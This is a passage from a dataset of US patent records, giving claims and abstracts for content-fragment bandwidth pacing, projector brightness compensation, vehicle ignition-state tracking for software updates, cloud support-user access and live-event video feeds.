receiving, from a playback component of a device, a request for a first content fragment; sending, to a content source, the request for the first content fragment; receiving, from the content source, the first content fragment and a second content fragment and storing the first content fragment and the second content fragment in a cache; determining a first length of time associated with receipt of the first content fragment from the content source and a second length of time associated with receipt of the second content fragment from the content source; determining a first bandwidth based on the first length of time and a size of the first content fragment and a second bandwidth based on the second length of time and a size of the second content fragment; sending, to the playback component from the cache, the first content fragment at a rate determined in accordance with the first bandwidth; receiving, from the playback component, a request for the second content fragment; and sending, to the playback component from the cache, the second content fragment at a rate determined in accordance with the second bandwidth. 10. The method of claim 9, wherein receiving the first content fragment and the second content fragment comprises receiving the first content fragment and the second content fragment in response to a determination by the content source that the playback component is likely to request playback of the second content fragment. 11. The method of claim 10, wherein determining at the content source that the playback component is likely to request playback of the second content fragment comprises determining at the content source that the second content fragment is related to the first content fragment. 12. 
The method of claim 9, wherein sending the first content fragment at a rate determined in accordance with the first bandwidth comprises sending the first content fragment at a rate that does not exceed the first bandwidth and sending the second content fragment at a rate determined in accordance with the second bandwidth comprises sending the second content fragment at a rate that does not exceed the second bandwidth. 13. The method of claim 9, wherein determining the first bandwidth comprises dividing the size of the first content fragment by the first length of time and determining the second bandwidth comprises dividing the size of the second content fragment by the second length of time. 14. The method of claim 9, wherein the content source communicates with the device using HTTP/2 protocol. 15. The method of claim 14, wherein receiving the first content fragment and the second content fragment comprises receiving a push promise message from the content source. 16. The method of claim 15, wherein the push promise message comprises the size of the first content fragment and the size of the second content fragment. 17. The method of claim 16, further comprising storing the size of the first content fragment as metadata with the first content fragment and the size of the second content fragment as metadata with the second content fragment. 18. A method comprising:
sending, to a cache associated with a device, a request for a content fragment; receiving, from the cache, the content fragment at a rate determined in accordance with a bandwidth based on a length of time associated with receipt of the content fragment from a source and a size of the content fragment; and initializing playback of the content fragment. 19. The method of claim 18, wherein the cache communicates with the source using HTTP/2 protocol. 20. The method of claim 19, wherein the cache receives from the source a push promise message, the push promise message comprising the size of the content fragment. | Methods and systems are disclosed herein for managing delivery of content fragments to a device in response to a bandwidth determination. In one implementation of the disclosure, when a content player or device requests a content fragment, a local cache may determine a bandwidth or data rate related to transmission of a content fragment from a source to the cache, and send the fragment to the player at a rate corresponding to the determined bandwidth or data rate.1. A method comprising:
receiving, from a content source, a plurality of content fragments and storing them in a cache; receiving, from a playback device, a request for one of the plurality of content fragments; determining a length of time associated with receipt of the content fragment from the content source; determining a bandwidth associated with transmission of the content fragment based on the determined length of time and a size of the content fragment; and sending, to the playback device, the content fragment at a rate determined in accordance with the determined bandwidth. 2. The method of claim 1, further comprising determining a playback quality associated with the content fragment based on the determined bandwidth. 3. The method of claim 1, wherein sending the content fragment at a rate determined in accordance with the determined bandwidth comprises sending the content fragment at a rate that does not exceed the determined bandwidth. 4. The method of claim 1, wherein determining a bandwidth associated with transmission of the content fragment comprises dividing the size of the content fragment by the determined length of time. 5. The method of claim 1, wherein the content source communicates with the device using HTTP/2 protocol. 6. The method of claim 5, wherein receiving a plurality of content fragments comprises receiving a push promise message from the content source. 7. The method of claim 6, wherein the push promise message comprises the size of each of the one or more content fragments. 8. The method of claim 7, further comprising storing the size of a content fragment as metadata with the corresponding content fragment. 9. A method comprising:
receiving, from a playback component of a device, a request for a first content fragment; sending, to a content source, the request for the first content fragment; receiving, from the content source, the first content fragment and a second content fragment and storing the first content fragment and the second content fragment in a cache; determining a first length of time associated with receipt of the first content fragment from the content source and a second length of time associated with receipt of the second content fragment from the content source; determining a first bandwidth based on the first length of time and a size of the first content fragment and a second bandwidth based on the second length of time and a size of the second content fragment; sending, to the playback component from the cache, the first content fragment at a rate determined in accordance with the first bandwidth; receiving, from the playback component, a request for the second content fragment; and sending, to the playback component from the cache, the second content fragment at a rate determined in accordance with the second bandwidth. 10. The method of claim 9, wherein receiving the first content fragment and the second content fragment comprises receiving the first content fragment and the second content fragment in response to a determination by the content source that the playback component is likely to request playback of the second content fragment. 11. The method of claim 10, wherein determining at the content source that the playback component is likely to request playback of the second content fragment comprises determining at the content source that the second content fragment is related to the first content fragment. 12. 
The method of claim 9, wherein sending the first content fragment at a rate determined in accordance with the first bandwidth comprises sending the first content asset at a rate that does not exceed the first bandwidth and sending the second content fragment at a rate determined in accordance with the second bandwidth comprises sending the second content asset at a rate that does not exceed the second bandwidth. 13. The method of claim 9, wherein determining the first bandwidth comprises dividing the size of the first content fragment by the first length of time and determining the second bandwidth comprises dividing the size of the second content fragment by the second length of time. 14. The method of claim 9, wherein the content source communicates with the device using HTTP/2 protocol. 15. The method of claim 14, wherein receiving the first content fragment and the second content fragment comprises receiving a push promise message from the content source. 16. The method of claim 15, wherein the push promise message comprises the size of the first content fragment and the size of the second content fragment. 17. The method of claim 16, further comprising storing the size of the first content fragment as metadata with the first content fragment and the size of the second content fragment as metadata with the second content fragment. 18. A method comprising:
sending, to a cache associated with a device, a request for a content fragment; receiving, from the cache, the content fragment at a rate determined in accordance with a bandwidth based on a length of time associated with receipt of the content asset from a source and a size of the content fragment; and initializing playback of the content fragment. 19. The method of claim 18, wherein the cache communicates with the source using HTTP/2 protocol. 20. The method of claim 19, wherein the cache receives from the source a push promise message, the push promise message comprising the size of the content fragment. | 2,400 |
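Editor's note, not part of the dataset row above: the bandwidth determination recited in claims 1, 4, and 12 of this record (fragment size divided by receipt time, with onward delivery paced so as not to exceed that rate) can be sketched as below. All function and variable names are illustrative, not taken from the patent.

```python
def determine_bandwidth(fragment_size_bytes, receipt_time_s):
    """Bandwidth in bytes/second: size of the fragment divided by the
    length of time the cache took to receive it from the source."""
    return fragment_size_bytes / receipt_time_s


def paced_send_duration(fragment_size_bytes, bandwidth_bps):
    """Minimum time for the cache to forward the fragment to the playback
    device without exceeding the determined bandwidth."""
    return fragment_size_bytes / bandwidth_bps


# A 4 MB fragment received from the source in 2 s implies 2 MB/s, so the
# cache would take at least 2 s to send it on to the playback device.
bw = determine_bandwidth(4_000_000, 2.0)
dur = paced_send_duration(4_000_000, bw)
```

This matches claim 4's "dividing the size of the content fragment by the determined length of time" and claim 3's "rate that does not exceed the determined bandwidth."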
9,186 | 9,186 | 15,607,098 | 2,422 | Disclosed are a display uniformity compensation method, an optical modulation apparatus, a signal processor, and a projection system. The method comprises: acquiring original image data and an optical loss coefficient a of a compensation region, acquiring t1 and t2, and making t2/t1=f*a/(1−a), where 0<f<=1, and t1+t2=T; determining full region image data and compensation image data through the original image data, t1, t2, and a, within time T when a frame of an image is being modulated, acquiring original light within a period of time t1, and performing modulation on the original light according to the full region image data; and acquiring compensation light within a period of time t2, other than the period of time t1, within the time T, and performing modulation on the compensation light according to the compensation image data. An embodiment of the present invention provides a method for improving a uniformity degree of brightness of an image on a display unit. | 1. A light source system, comprising:
an original light source, for generating an original light; a compensation light source, for generating a compensation light; a wavelength conversion device, including a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light; and a control device, for controlling turning on and turning off of the original light source and the compensation light source. 2. The light source system of claim 1, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 3. The light source system of claim 1, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 4. The light source system of claim 1, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 5. The light source system of claim 4, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 6. The light source system of claim 1, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 7. 
The light source system of claim 6, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 8. The light source system of claim 6, wherein the wavelength conversion layer has a circular shape, wherein the original region and the compensation region each spans an angular range, and wherein a ratio of the angular ranges of the original region and the compensation region is a predetermined value. 9. The light source system of claim 6, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 10. The light source system of claim 1, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 11. The light source system of claim 1, further comprising a light combination device which combines the original light and the compensation light into one beam of output light. 12. The light source system of claim 11, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 13. A projection system, comprising:
a light source system; an optical modulation device; and a projection lens, wherein the light source system includes an original light source generating an original light, a compensation light source generating a compensation light, a wavelength conversion device and a control device, wherein the wavelength conversion device includes a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light, and wherein the control device controls turning on and turning off of the original light source and the compensation light source, wherein the optical modulation device modulates the light outputted by the light source system to generate an image light beam, and wherein the projection lens projects the image light beam from the optical modulation device to a predetermined plane. 14. The projection system of claim 13, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 15. The projection system of claim 13, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 16. The projection system of claim 13, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 17. The projection system of claim 16, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 18. 
The projection system of claim 13, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 19. The projection system of claim 18, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 20. The projection system of claim 18, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 21. The projection system of claim 13, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 22. The projection system of claim 13, wherein the light source system further includes a light combination device which combines the original light and the compensation light into one beam of output light. 23. The projection system of claim 22, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 24. The projection system of claim 13, wherein the optical modulation device includes a signal processor, for:
acquiring an original image data and an optical loss coefficient a of a compensation region, where a grayscale value of the original image data corresponding to an arbitrary point A in a non-compensation region of a display unit is u, and that corresponding to an arbitrary point B in the predetermined compensation region of the display unit is v; acquiring values t1 and t2, such that t2/t1=f*a/(1−a), where 0<f≦1, and t1+t2=T; acquiring values m and n, such that m*t1/T+n*t2/T=u*t1/T, and where at least two values among m, n and u satisfy a predetermined relationship; determining a full region image data and a compensation image data based on m, n and v, where a grayscale value of the full region image data corresponding to the point A is m and that corresponding to the point B is v, and where a grayscale value of the compensation image data corresponding to the point A is n and that corresponding to the point B is q, where q≧v, and where q and v satisfy a predetermined relationship; and wherein the optical modulation device acquires the original light and modulates the original light according to the full region image data within a time period t1 of a time period T when a frame of image is being modulated, and acquires a compensation light and modulates the compensation light according to the compensation image data within a time period t2 of the time period T, wherein t2 is a time period within the time period T other than the time period t1. | Disclosed are a display uniformity compensation method, an optical modulation apparatus, a signal processor, and a projection system. 
The method comprises: acquiring original image data and an optical loss coefficient a of a compensation region, acquiring t1 and t2, and making t2/t1=f*a/(1−a), where 0<f<=1, and t1+t2=T; determining full region image data and compensation image data through the original image data, t1, t2, and a, within time T when a frame of an image is being modulated, acquiring original light within a period of time t1, and performing modulation on the original light according to the full region image data; and acquiring compensation light within a period of time t2, other than the period of time t1, within the time T, and performing modulation on the compensation light according to the compensation image data. An embodiment of the present invention provides a method for improving a uniformity degree of brightness of an image on a display unit.1. A light source system, comprising:
an original light source, for generating an original light; a compensation light source, for generating a compensation light; a wavelength conversion device, including a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light; and a control device, for controlling turning on and turning off of the original light source and the compensation light source. 2. The light source system of claim 1, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 3. The light source system of claim 1, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 4. The light source system of claim 1, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 5. The light source system of claim 4, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 6. The light source system of claim 1, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 7. 
The light source system of claim 6, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 8. The light source system of claim 6, wherein the wavelength conversion layer has a circular shape, wherein the original region and the compensation region each spans an angular range, and wherein a ratio of the angular ranges of the original region and the compensation region is a predetermined value. 9. The light source system of claim 6, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 10. The light source system of claim 1, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 11. The light source system of claim 1, further comprising a light combination device which combines the original light and the compensation light into one beam of output light. 12. The light source system of claim 11, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 13. A projection system, comprising:
a light source system; an optical modulation device; and a projection lens, wherein the light source system includes an original light source generating an original light, a compensation light source generating a compensation light, a wavelength conversion device and a control device, wherein the wavelength conversion device includes a wavelength conversion layer and a substrate carrying the wavelength conversion layer, wherein the wavelength conversion layer includes a wavelength conversion material that absorbs the original light and/or the compensation light to generate a converted light, and wherein the control device controls turning on and turning off of the original light source and the compensation light source, wherein the optical modulation device modulates the light outputted by the light source system to generate an image light beam, and wherein the projection lens projects the image light beam from the optical modulation device to a predetermined plane. 14. The projection system of claim 13, wherein within a time period T when a frame of image data is being modulated, within a time period t1 when original image data is being modulated, the control device controls the original light source to turn on, and within a time period t2 when compensation image data is being modulated, the control device controls the compensation light source to turn on, wherein t1+t2=T. 15. The projection system of claim 13, wherein the wavelength conversion layer includes a yellow wavelength conversion material. 16. The projection system of claim 13, wherein the wavelength conversion layer includes at least two regions, one of the regions being a transparent region. 17. The projection system of claim 16, wherein the wavelength conversion layer includes two regions, one of the regions being a transparent region, the other one of the regions including a yellow wavelength conversion material. 18. 
The projection system of claim 13, wherein the wavelength conversion layer includes an original region and a compensation region, the original region and the original light source together outputting the original light, and the compensation region and the compensation light source together outputting the compensation light. 19. The projection system of claim 18, wherein each of the original region and the compensation region includes a plurality of segments, wherein one segment of the original region and one segment of the compensation region that corresponds to the one segment of the original region include the same wavelength conversion material. 20. The projection system of claim 18, wherein the compensation region includes a yellow wavelength conversion material or a green wavelength conversion material. 21. The projection system of claim 13, wherein the original light source is a blue solid state light emitting device and the compensation light source is a red solid state light emitting device or a green solid state light emitting device. 22. The projection system of claim 13, wherein the light source system further includes a light combination device which combines the original light and the compensation light into one beam of output light. 23. The projection system of claim 22, wherein the light combination device includes X shaped dichroic filter plates, wherein the original light and the compensation light are respectively incident to the X shaped dichroic filter plates from three sides and exit from another side of the X shaped dichroic filter plates different from the three sides;
or wherein the light combination device includes two parallel filter plates which combine the original light and the compensation light into one light beam. 24. The projection system of claim 13, wherein the optical modulation device includes a signal processor, for:
acquiring an original image data and an optical loss coefficient a of a compensation region, where a grayscale value of the original image data corresponding to an arbitrary point A in a non-compensation region of a display unit is u, and that corresponding to an arbitrary point B in the predetermined compensation region of the display unit is v; acquiring values t1 and t2, such that t2/t1=f*a/(1−a), where 0<f≦1, and t1+t2=T; acquiring values m and n, such that m*t1/T+n*t2/T=u*t1/T, and where at least two values among m, n and u satisfy a predetermined relationship; determining a full region image data and a compensation image data based on m, n and v, where a grayscale value of the full region image data corresponding to the point A is m and that corresponding to the point B is v, and where a grayscale value of the compensation image data corresponding to the point A is n and that corresponding to the point B is q, where q≧v, and where q and v satisfy a predetermined relationship; and wherein the optical modulation device acquires the original light and modulates the original light according to the full region image data within a time period t1 of a time period T when a frame of image is being modulated, and acquires a compensation light and modulates the compensation light according to the compensation image data within a time period t2 of the time period T, wherein t2 is a time period within the time period T other than the time period t1. | 2,400 |
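Editor's note, not part of the dataset row above: the frame-time split in claim 24 of this record is fully determined by the two stated constraints, t2/t1 = f*a/(1−a) and t1+t2 = T. A sketch of the arithmetic (names are illustrative, not from the patent):

```python
def split_frame_time(T, a, f):
    """Solve t2/t1 = f*a/(1-a) together with t1 + t2 = T, where a is the
    optical loss coefficient of the compensation region and 0 < f <= 1."""
    assert 0 < f <= 1 and 0 < a < 1
    ratio = f * a / (1 - a)   # t2/t1 per the claim
    t1 = T / (1 + ratio)      # substitute t2 = ratio * t1 into t1 + t2 = T
    t2 = T - t1
    return t1, t2


# With T = 1, a = 0.2, f = 1: ratio = 0.25, so t1 = 0.8 and t2 = 0.2.
t1, t2 = split_frame_time(1.0, 0.2, 1.0)
```

So the larger the loss coefficient a (or the factor f), the larger the share of the frame period T devoted to modulating the compensation light.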
9,187 | 9,187 | 15,641,753 | 2,444 | A system includes a processor configured to maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure. The processor is further configured to receive data packets from the vehicle communication device indicating an ignition state change and determine a present vehicle ignition state based on the data packets. | 1. A system comprising:
a processor configured to: maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure; receive data packets from the vehicle communication device indicating an ignition state change; and determine a present vehicle ignition state based on the data packets. 2. The system of claim 1, wherein the processor is configured to attempt to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 3. The system of claim 1, wherein the vehicle communication device includes a cellular modem. 4. The system of claim 1, wherein the processor is configured to report the present vehicle ignition state to an update process. 5. The system of claim 1, wherein the processor is configured to report a change in the present vehicle ignition state, upon determining the present vehicle ignition state has changed from a previously determined vehicle ignition state, to an update process. 6. A system comprising:
a processor configured to: determine that an update is available for a vehicle; query a vehicle watchdog process, designed to maintain perpetual vehicle connectivity, absent environmental interference or hardware failure, for a current vehicle ignition state; and deliver a data payload responsive to receiving an indication from the watchdog process that the vehicle ignition state matches a state designated for payload delivery. 7. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 8. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 9. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 10. The system of claim 6, wherein the data payload includes a software update package. 11. The system of claim 6, wherein the processor is further configured to receive confirmation of a successful payload delivery and log the confirmation in a record indicating a vehicle software status. 12. A computer-implemented method comprising:
maintaining a perpetual connection to a vehicle communication device, absent environmental interference or vehicle communication device failure; receiving data packets from the vehicle communication device indicating an ignition state change; and determining a present vehicle ignition state based on the data packets. 13. The method of claim 12, further comprising attempting to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 14. The method of claim 12, wherein the vehicle communication device includes a cellular modem. 15. The method of claim 12, further comprising:
determining that an update is available for a vehicle; and delivering a data payload responsive to determining the vehicle ignition state matches a state designated for payload delivery. 16. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 17. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 18. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 19. The method of claim 15, wherein the data payload includes a software update package. 20. The method of claim 15, further comprising receiving confirmation of a successful payload delivery and logging the confirmation in a record indicating a vehicle software status.
a processor configured to: maintain a perpetual connection to a vehicle communication device, barring environmental interference or vehicle communication device failure; receive data packets from the vehicle communication device indicating an ignition state change; and determine a present vehicle ignition state based on the data packets. 2. The system of claim 1, wherein the processor is configured to attempt to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 3. The system of claim 1, wherein the vehicle communication device includes a cellular modem. 4. The system of claim 1, wherein the processor is configured to report the present vehicle ignition state to an update process. 5. The system of claim 1, wherein the processor is configured to report a change in the present vehicle ignition state, upon determining the present vehicle ignition state has changed from a previously determined vehicle ignition state, to an update process. 6. A system comprising:
a processor configured to: determine that an update is available for a vehicle; query a vehicle watchdog process, designed to maintain perpetual vehicle connectivity, absent environmental interference or hardware failure, for a current vehicle ignition state; and deliver a data payload responsive to receiving an indication from the watchdog process that the vehicle ignition state matches a state designated for payload delivery. 7. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 8. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 9. The system of claim 6, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 10. The system of claim 6, wherein the data payload includes a software update package. 11. The system of claim 6, wherein the processor is further configured to receive confirmation of a successful payload delivery and log the confirmation in a record indicating a vehicle software status. 12. A computer-implemented method comprising:
maintaining a perpetual connection to a vehicle communication device, absent environmental interference or vehicle communication device failure; receiving data packets from the vehicle communication device indicating an ignition state change; and determining a present vehicle ignition state based on the data packets. 13. The method of claim 12, further comprising attempting to re-establish the perpetual connection, responsive to resumed connection availability following environmental interference. 14. The method of claim 12, wherein the vehicle communication device includes a cellular modem. 15. The method of claim 12, further comprising:
determining that an update is available for a vehicle; and delivering a data payload responsive to determining the vehicle ignition state matches a state designated for payload delivery. 16. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition on state. 17. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an accessory on state. 18. The method of claim 15, wherein the vehicle ignition state designated for payload delivery includes an ignition off state. 19. The method of claim 15, wherein the data payload includes a software update package. 20. The method of claim 15, further comprising receiving confirmation of a successful payload delivery and logging the confirmation in a record indicating a vehicle software status. | 2,400 |
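Editor's note, not part of the dataset row above: claims 6 and 15 of this record gate payload delivery on the ignition state reported by the watchdog process matching a designated state. A minimal sketch of that gate, with all names hypothetical:

```python
# States the claims designate for payload delivery (claims 7-9 / 16-18).
DESIGNATED_STATES = {"ignition_on", "accessory_on", "ignition_off"}


def may_deliver(update_available, current_state, designated_state):
    """Deliver the data payload only when an update exists and the current
    ignition state matches the state designated for payload delivery."""
    assert designated_state in DESIGNATED_STATES
    return update_available and current_state == designated_state


# An update pending while the ignition is off, with delivery designated
# for the ignition-off state, passes the gate.
ok = may_deliver(True, "ignition_off", "ignition_off")
```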
9,188 | 9,188 | 15,843,304 | 2,434 | Disclosed herein are system, method, and computer program product embodiments for generating support user permissions to allow access to a cloud computing platform. In an embodiment, a host system may host a cloud computing platform and may provide access to the cloud computing platform to a tenant system. The tenant system may then facilitate access to the cloud computing platform to users. The tenant system may maintain a list of authorized users separate from the host system. In an embodiment, if the tenant system requests support from the host system to fix a problem, the host system is able to generate access for support users to access the cloud computing platform to troubleshoot the problem. In an embodiment, even though the tenant system maintains a separate list of authorized users, the host system is able to generate support user permissions. | 1. A computer implemented method, comprising:
providing, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system; receiving, at the host system, a cloud computing platform access request from a user account; analyzing, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and facilitating, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 2. The computer implemented method of claim 1, wherein the assistance request includes a help ticket identification generated by the cloud computing platform. 3. The computer implemented method of claim 1, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 4. The computer implemented method of claim 1, wherein the cloud computing platform access request includes login credentials, the method further comprising:
searching a database managed by the host system for information matching the login credentials; and associating a cloud computing access permission with the user account. 5. The computer implemented method of claim 1, further comprising:
determining that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generating a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 6. The computer implemented method of claim 1, further comprising:
granting, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 7. The computer implemented method of claim 1, further comprising:
granting, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. 8. A system, comprising:
a memory; and at least one processor coupled to the memory and configured to:
provide, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system;
receive, at the host system, a cloud computing platform access request from a user account;
analyze, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and
facilitate, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 9. The system of claim 8, wherein the assistance request includes a help ticket identification generated by the cloud computing platform. 10. The system of claim 8, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 11. The system of claim 8, wherein the cloud computing platform access request includes login credentials and wherein the at least one processor is further configured to:
search a database managed by the host system for information matching the login credentials; and associate a cloud computing access permission with the user account. 12. The system of claim 8, wherein the at least one processor is further configured to:
determine that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generate a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 13. The system of claim 8, wherein the at least one processor is further configured to:
grant, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 14. The system of claim 8, wherein the at least one processor is further configured to:
grant, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. 15. A non-transitory computer-readable device having instructions stored thereon that, when executed by at least one computing device, cause the at least one computing device to perform operations comprising:
providing, by a host system, a cloud computing platform to a tenant system, wherein the tenant system utilizes an authorization process separate from an authorization process used by the host system; receiving, at the host system, a cloud computing platform access request from a user account; analyzing, by the host system, the cloud computing platform access request to determine that the cloud computing platform access request includes an assistance request from the tenant system; and facilitating, by the host system, access to the cloud computing platform to the user account in response to determining that the cloud computing platform access request includes an assistance request from the tenant system. 16. The non-transitory computer-readable device of claim 15, wherein the assistance request includes an identification of a tenant device configured to utilize the tenant system to access the cloud computing platform. 17. The non-transitory computer-readable device of claim 15, wherein the cloud computing platform access request includes login credentials, the operations further comprising:
searching a database managed by the host system for information matching the login credentials; and associating a cloud computing access permission with the user account. 18. The non-transitory computer-readable device of claim 15, the operations further comprising:
determining that the tenant system maintains a database of authorized users separate from the host system; and in response to receiving the cloud computing platform access request from the user account, generating a support user account in the host system, wherein the support user account includes a permission to access the cloud computing platform. 19. The non-transitory computer-readable device of claim 15, the operations further comprising:
granting, by the host system to the tenant system, a permission to monitor user account interactions with the cloud computing platform. 20. The non-transitory computer-readable device of claim 15, the operations further comprising:
granting, by the host system to the tenant system, a permission to modify cloud computing platform interactions available to the user account. | 2,400 |
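The host/tenant support flow of claims 1 and 5 above can be sketched in Python. This is a minimal sketch under assumed names; the request shape (`assistance_request`, `ticket_id`) and the permission label are invented for illustration.

```python
# Hypothetical sketch of claims 1, 2 and 5: the host system grants platform
# access to a user account only when the access request carries an assistance
# request from the tenant (e.g. a help ticket identification), and does so by
# generating a support user account in the host system - even though the
# tenant maintains its own, separate list of authorized users.

def handle_access_request(request, host_accounts):
    """Return a generated support account with platform access, or None."""
    # Claim 1: analyze the request to determine that it includes an
    # assistance request from the tenant system (claim 2: a help ticket id).
    assistance = request.get("assistance_request")
    if not assistance or "ticket_id" not in assistance:
        return None
    # Claim 5: generate a support user account in the host system that
    # includes a permission to access the cloud computing platform.
    account = {
        "user": request["user"],
        "permissions": {"cloud_platform_access"},
        "ticket_id": assistance["ticket_id"],
    }
    host_accounts[request["user"]] = account
    return account
```

A request without an assistance request is refused outright, which matches the claim's condition that access is facilitated only in response to determining the assistance request is present.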
9,189 | 9,189 | 15,993,353 | 2,426 | A server, system, and method generate a live video feed. The method is performed at a server connected to a computer network. The method includes receiving an indication of a predetermined type of action during a live event. The method includes generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event. The method includes identifying a user device that is to receive the first video feed based on predetermined rules. The method includes determining whether the user device is prepared to receive the first video feed. When the user device is prepared, the method includes transmitting the first video feed to the user device for automatic playback on the user device to display a video of the predetermined type of action currently occurring during the live event. | 1. A method, comprising:
at a server connected to a computer network: receiving an indication of a predetermined type of action during a live event; generating a first video feed associated with the predetermined type of action, the first video feed being distinct from a broadcast feed of the live event; identifying a user device that is to receive the first video feed based on predetermined rules; determining whether the user device is prepared to receive the first video feed; and when the user device is prepared, transmitting the first video feed to the user device for automatic playback on the user device to display a video of the predetermined type of action currently occurring during the live event. 2. The method of claim 1, wherein the first video feed has a predefined, finite duration. 3. The method of claim 2, wherein the predefined, finite duration is based on one of a server system clock, a game clock tracking the live event, or a length corresponding to the predetermined type of action. 4. The method of claim 2, wherein the predefined, finite duration is defined by an entity owning rights to the live event. 5. The method of claim 1, further comprising:
receiving a request to view the broadcast feed, indicating that the user device has requested to switch to the broadcast feed. 6. The method of claim 5, further comprising:
verifying that one of the user device or a user using the user device is entitled to view the broadcast feed. 7. The method of claim 1, wherein the user device is prepared when one of the user device is not currently playing a video, the user device has a particular application launched thereon, or a combination thereof. 8. The method of claim 7, further comprising:
transmitting a status request to the user device to identify one of whether the user device is currently playing a video, whether the user device has a particular application launched thereon, or a combination thereof; and receiving a response to the status request from the user device. 9. The method of claim 8, wherein, when the user device is unprepared to receive the first video feed, transmitting a message to be presented on the user device indicating that the predetermined type of action is occurring in the live event without displaying the first video feed. 10. The method of claim 1, further comprising:
